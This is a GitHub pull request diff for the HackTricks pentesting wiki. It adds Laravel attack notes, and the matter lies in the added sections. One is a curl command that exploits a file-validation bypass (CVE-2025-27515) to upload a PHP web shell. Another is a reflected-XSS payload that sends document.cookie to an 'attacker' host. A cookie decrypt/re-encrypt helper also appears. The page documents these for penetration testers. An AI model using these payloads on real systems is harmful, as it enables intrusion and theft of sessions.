Skip to content

Research Update Enhanced src/network-services-pentesting/pen... #1703

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
carlospolop wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Research Update Enhanced src/network-services-pentesting/pen... #1703

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
1 change: 1 addition & 0 deletions src/SUMMARY.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -375,6 +375,7 @@
- [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md)
- [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md)
- [In Memory Jni Shellcode Execution](mobile-pentesting/android-app-pentesting/in-memory-jni-shellcode-execution.md)
- [Inputmethodservice Ime Abuse](mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md)
- [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md)
- [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md)
- [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md)
Expand Down
1 change: 1 addition & 0 deletions src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -81,3 +81,4 @@ adb shell ime help
- **User/MDM**: allowlist trusted keyboards; block unknown IMEs in managed profiles/devices.
- **App-side (high risk apps)**: prefer phishing-resistant auth (passkeys/biometrics) and avoid relying on β€œsecret text entry” as a security boundary (a malicious IME sits below the app UI).

{{#include ../../banners/hacktricks-training.md}}
55 changes: 55 additions & 0 deletions src/network-services-pentesting/pentesting-web/laravel.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -134,6 +134,33 @@ email=a@b.c&password=whatever&remember=0xdf

---

## CVE-2025-27515 – Wildcard file validation bypass (`files.*`)

Laravel 10.0–10.48.28, 11.0.0–11.44.0 and 12.0.0–12.1.0 let crafted multipart requests completely skip any rule attached to `files.*` / `images.*`. The parser that expands wildcard keys could be confused with attacker-controlled placeholders (for example, pre-populating `__asterisk__` segments), so the framework would hydrate `UploadedFile` objects without ever running `image`, `mimes`, `dimensions`, `max`, etc. Once a malicious blob lands in `Storage::putFile*` you can pivot to any of the file-upload primitives already listed in HackTricks (web shells, log poisoning, signed job deserialization, …).

### Hunting for the pattern

* Static: `rg -n "files\\.\*" -g"*.php" app/` or inspect `FormRequest` classes for `rules()` returning arrays that contain `files.*`.
* Dynamic: hook `Illuminate\Validation\Validator::validate()` via Xdebug or Laravel Telescope in pre-production to log every request that hits the vulnerable rule.
* Middleware/route review: endpoints bundling multiple files (avatar importers, document portals, drag-n-drop components) tend to trust `files.*`.

### Practical exploitation workflow

1. Capture a legitimate upload and replay it in Burp Repeater.
2. Duplicate the same part but alter the field name so it already includes placeholder tokens (e.g., `files[0][__asterisk__payload]`) or nest another array (`files[0][alt][0]`). On vulnerable builds, that second part never gets validated but still becomes an `UploadedFile` entry.
3. Point the forged file to a PHP payload (`shell.php`, `.phar`, polyglot) and force the application to store it in a web-accessible disk (commonly `public/` once `php artisan storage:link` is enabled).

```bash
curl -sk https://target/upload \
-F 'files[0]=@ok.png;type=image/png' \
-F 'files[0][__asterisk__payload]=@shell.php;type=text/plain' \
-F 'description=lorem'
```

Keep fuzzing key names (`files.__dot__0`, `files[0][0]`, `files[0][uuid]` …) until you find one that bypasses the validator but still gets written to disk; patched versions reject these crafted attribute names immediately.

---

## Laravel Tricks

### Debugging mode
Expand All @@ -145,6 +172,27 @@ For example `http://127.0.0.1:8000/profiles`:

This is usually needed for exploiting other Laravel RCE CVEs.

#### CVE-2024-13918 / CVE-2024-13919 – reflected XSS in Whoops debug pages

* Affected: Laravel 11.9.0–11.35.1 with `APP_DEBUG=true` (either globally or forced via misconfigured env overrides like CVE-2024-52301).
* Primitive: every uncaught exception rendered by Whoops echoes parts of the request/route **without HTML encoding**, so injecting `<img src>` / `<script>` in a route or request parameter yields stored-on-response XSS before authentication.
* Impact: steal `XSRF-TOKEN`, leak stack traces with secrets, open a browser-based pivot to hit `_ignition/execute-solution` in victim sessions, or chain with passwordless dashboards that rely on cookies.

Minimal PoC:

```php
// blade/web.php (attacker-controlled param reflected)
Route::get('/boom/{id}', function ($id) {
abort(500);
});
```

```bash
curl -sk "https://target/boom/%3Cscript%3Efetch('//attacker/x?c='+document.cookie)%3C/script%3E"
```

Even if debug mode is normally off, forcing an error via background jobs or queue workers and probing the `_ignition/health-check` endpoint often reveals staging hosts that still expose this chain.

### Fingerprinting & exposed dev endpoints

Quick checks to identify a Laravel stack and dangerous dev tooling exposed in production:
Expand Down Expand Up @@ -172,6 +220,9 @@ Using the secret APP_KEY of Laravel you can decrypt and re-encrypt cookies:

### Decrypt Cookie

<details>
<summary>Decrypt/encrypt cookies helper (Python)</summary>

```python
import os
import json
Expand Down Expand Up @@ -231,6 +282,8 @@ decrypt('eyJpdiI6ImJ3TzlNRjV6bXFyVjJTdWZhK3JRZ1E9PSIsInZhbHVlIjoiQ3kxVDIwWkRFOE1
encrypt(b'{"data":"a:6:{s:6:\"_token\";s:40:\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2SwepVOiUw\";s:8:\"username\";s:8:\"guest60e\";s:5:\"order\";s:8:\"lolololo\";s:9:\"direction\";s:4:\"desc\";s:6:\"_flash\";a:2:{s:3:\"old\";a:0:{}s:3:\"new\";a:0:{}}s:9:\"_previous\";a:1:{s:3:\"url\";s:38:\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\";}}","expires":1605141157}')
```

</details>

### Laravel Deserialization RCE

Vulnerable versions: 5.5.40 and 5.6.x through 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
Expand All @@ -255,6 +308,8 @@ Another deserialization: [https://github.com/ambionics/laravel-exploits](https:/
* [CVE-2024-52301 advisory – Laravel argv env detection](https://github.com/advisories/GHSA-gv7v-rgg6-548h)
* [CVE-2024-52301 PoC – register_argc_argv HTTP argv β†’ --env override](https://github.com/Nyamort/CVE-2024-52301)
* [0xdf – HTB Environment (CVE‑2024‑52301 env override β†’ auth bypass)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
* [GHSA-78fx-h6xr-vch4 – Laravel wildcard file validation bypass (CVE-2025-27515)](https://github.com/laravel/framework/security/advisories/GHSA-78fx-h6xr-vch4)
* [SBA Research – CVE-2024-13919 reflected XSS in debug-mode error page](http://www.openwall.com/lists/oss-security/2025/03/10/4)


{{#include ../../banners/hacktricks-training.md}}